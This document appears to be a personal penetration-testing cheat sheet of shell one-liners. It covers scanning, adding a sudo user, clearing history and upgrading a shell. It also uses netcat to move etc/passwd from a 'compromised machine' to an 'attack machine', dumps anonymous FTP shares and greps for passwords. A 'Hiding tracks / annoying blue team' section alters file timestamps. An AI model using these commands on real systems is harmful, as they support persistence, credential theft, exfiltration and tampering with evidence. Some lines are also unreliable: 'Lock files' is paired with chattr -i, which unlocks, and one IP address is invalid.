# Host discovery
nmap -sP ip
netdiscover -r 192.168.225.1/24

# Open ports, -sV for more detail / less speed
nmap -T4 -sV ip

# Add user:
sudo adduser username

# Change password:
sudo passwd username

# Sudo priv to new user:
sudo usermod -aG sudo username

# Clear history: 
sudo history -c

# Upgrade shells:
python -c 'import pty; pty.spawn("/bin/bash")'  

# Netcat file transfer
# Compromised machine: 
tar -zcf - etc/passwd | pv | nc -l -p 5555 -q -5
# Attack machine: 
nc -w 3 192.168.225.131 5555 | tar -zxf -

# Anonymous FTP dump to box
wget --recursive --no-parent ftp://anonymous:anonymous@10.10.10.666/Program%20Data/
wget -m ftp://anonymous:anonymous@10.10.10.666/Program%20Data/

# Grep folders for password  (-R recursive -i ignore case -A5 include 5 lines of text after)
grep -R -i -A5 password .

# Grep all files in current directory . (-w for only that string)
grep -R STRING *

- + - + - + - + - + - + - + - + - + - + - + - + 
# Hiding tracks / annoying blue team
- + - + - + - + - + - + - + - + - + - + - + - + 

# Lock files:
sudo chattr -i /etc/passwd

# Change time:
sudo touch -a -m -t YYYYMMDDHHMM.SS filename

- + - + - + - + - + - + - + - + - + - + - + - + 
# Under Construction
- + - + - + - + - + - + - + - + - + - + - + - + 

# Adding / generating ssh keys
